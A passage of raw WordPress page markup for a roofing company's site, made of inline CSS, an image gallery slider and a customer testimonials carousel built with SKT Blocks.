.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/gallery\" rel=\"noopener noreferrer\" target=\"_blank\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\"} -->\n<style type=\"text/css\"> .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"f3bc0552-a5a5-4575-aa4d-c19791bc625e\"} -->\n<style type=\"text/css\"> .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4ef232e7-4452-4f40-9949-fe0d82ccff32\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-4ef232e7-4452-4f40-9949-fe0d82ccff32 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7fb2dcec-224f-4765-8762-daef2cd5aa1c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7fb2dcec-224f-4765-8762-daef2cd5aa1c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. \",\"name\":\"RIck \\u0026amp; Peggy \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..\",\"name\":\"Mike\",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"be53c5bc\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-be53c5bc\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-be53c5bc\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. </div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" 